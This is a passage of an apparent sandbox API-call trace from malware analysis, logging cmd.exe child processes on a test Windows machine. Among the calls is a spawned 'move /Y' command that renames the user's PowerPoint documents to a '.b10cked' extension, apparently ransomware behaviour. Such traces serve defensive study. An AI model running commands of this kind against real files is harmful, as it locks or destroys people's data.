_MaxCount=0x7) returned 2 [0234.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) 
returned 2 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.825] 
_wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2=".") returned 73 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2="..") returned 73 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x291e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.826] SetErrorMode (uMode=0x1) returned 0x0 [0234.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1ef1a4, lpFilePart=0x1ef18c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x1ef18c*="wj5G.ppt") returned 0x2b [0234.826] SetErrorMode (uMode=0x0) returned 0x1 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2=".") returned 73 [0234.826] _wcsicmp (_String1="wj5G.ppt", _String2="..") returned 73 [0234.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: 
"c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.826] SetErrorMode (uMode=0x1) returned 0x0 [0234.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1ef620, lpFilePart=0x1ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x1ef3b8*="wj5G.ppt") returned 0x2b [0234.826] SetErrorMode (uMode=0x0) returned 0x1 [0234.826] SetErrorMode (uMode=0x0) returned 0x0 [0234.827] SetErrorMode (uMode=0x1) returned 0x0 [0234.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1ef828, lpFilePart=0x1ef3b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", lpFilePart=0x1ef3b8*="wj5G.ppt.b10cked") returned 0x33 [0234.827] SetErrorMode (uMode=0x0) returned 0x1 [0234.827] SetLastError (dwErrCode=0x0) [0234.827] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt.b10cked")) returned 0xffffffff [0234.827] GetLastError () returned 0x2 [0234.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", fInfoLevelId=0x1, lpFindFileData=0x1eed34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed34) returned 0x280e68 [0234.827] FindNextFileW (in: hFindFile=0x280e68, lpFindFileData=0x1eed34 | out: lpFindFileData=0x1eed34) returned 0 [0234.827] GetLastError () returned 0x12 [0234.827] FindClose (in: hFindFile=0x280e68 | out: hFindFile=0x280e68) returned 1 [0234.828] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", fInfoLevelId=0x1, lpFindFileData=0x291bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x291bd8) returned 0x280e68 [0234.828] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked", lpFilePart=0x0) returned 0x33 [0234.828] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", nBufferLength=0x104, lpBuffer=0x1eefcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt", lpFilePart=0x0) returned 0x2b [0234.828] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt")) returned 0x20 [0234.829] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\wj5g.ppt.b10cked"), dwFlags=0x3) returned 1 [0234.829] FindClose (in: hFindFile=0x280e68 | out: hFindFile=0x280e68) returned 1 [0234.829] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eef80 | out: _Buffer=" 1") returned 9 [0234.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.829] GetFileType (hFile=0x7) returned 0x2 [0235.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eef0c | out: lpMode=0x1eef0c) returned 1 [0235.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.359] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eef40 | out: lpConsoleScreenBufferInfo=0x1eef40) returned 1 [0235.359] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.359] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, 
nSize=0x2000, Arguments=0x1eef80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.359] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eef64, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x1eef64*=0x1a) returned 1 [0235.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.359] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.360] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.360] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.360] SetConsoleInputExeNameW () returned 0x1 [0235.360] GetConsoleOutputCP () returned 0x1b5 [0235.360] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.360] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.360] exit (_Code=0) Process: id = "639" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35098 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35099 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35100 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35101 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35102 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35103 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35104 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35105 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35106 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35107 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35619 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35620 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id 
= 35621 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35622 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 35623 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 35624 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35625 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35626 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35627 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35628 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35629 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35630 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35631 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35632 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35633 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 35634 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35635 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35636 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35637 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35638 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35639 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35640 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 35641 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename 
= "" Region: id = 35642 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 879 os_tid = 0xf08 [0235.819] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af864 | out: lpSystemTimeAsFileTime=0x2af864*(dwLowDateTime=0xc0068b20, dwHighDateTime=0x1d440a9)) [0235.819] GetCurrentProcessId () returned 0xa64 [0235.819] GetCurrentThreadId () returned 0xf08 [0235.819] GetTickCount () returned 0x40bb3 [0235.819] QueryPerformanceCounter (in: lpPerformanceCount=0x2af85c | out: lpPerformanceCount=0x2af85c*=29260864946) returned 1 [0235.820] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.820] __set_app_type (_Type=0x1) [0235.820] __p__fmode () returned 0x76b331f4 [0235.820] __p__commode () returned 0x76b331fc [0235.820] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.820] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.820] GetCurrentThreadId () returned 0xf08 [0235.820] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf08) returned 0x38 [0235.820] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.821] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.821] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.821] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.821] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7f4 | out: phkResult=0x2af7f4*=0x0) returned 0x2 [0235.821] VirtualQuery (in: lpAddress=0x2af82b, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.821] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7c4, dwLength=0x1c | out: lpBuffer=0x2af7c4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.821] GetConsoleOutputCP () returned 0x1b5 [0235.821] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.821] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.821] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.821] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.821] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.821] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.822] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.822] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.822] GetEnvironmentStringsW () returned 0x470168* [0235.822] FreeEnvironmentStringsW (penv=0x470168) returned 1 [0235.822] GetEnvironmentStringsW () returned 0x470168* [0235.823] FreeEnvironmentStringsW (penv=0x470168) returned 1 [0235.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae764 | out: phkResult=0x2ae764*=0x40) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x90, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x0, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegCloseKey (hKey=0x40) returned 0x0 [0235.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae764 | out: phkResult=0x2ae764*=0x40) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x40, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x1, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x0, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x4, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x4) returned 0x0 [0235.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae76c, lpData=0x2ae770, 
lpcbData=0x2ae768*=0x1000 | out: lpType=0x2ae76c*=0x0, lpData=0x2ae770*=0x9, lpcbData=0x2ae768*=0x1000) returned 0x2 [0235.823] RegCloseKey (hKey=0x40) returned 0x0 [0235.823] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0235.823] srand (_Seed=0x5b8863c3) [0235.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" [0235.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"" [0235.823] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.824] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4718c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.824] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.824] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.824] _wcsicmp 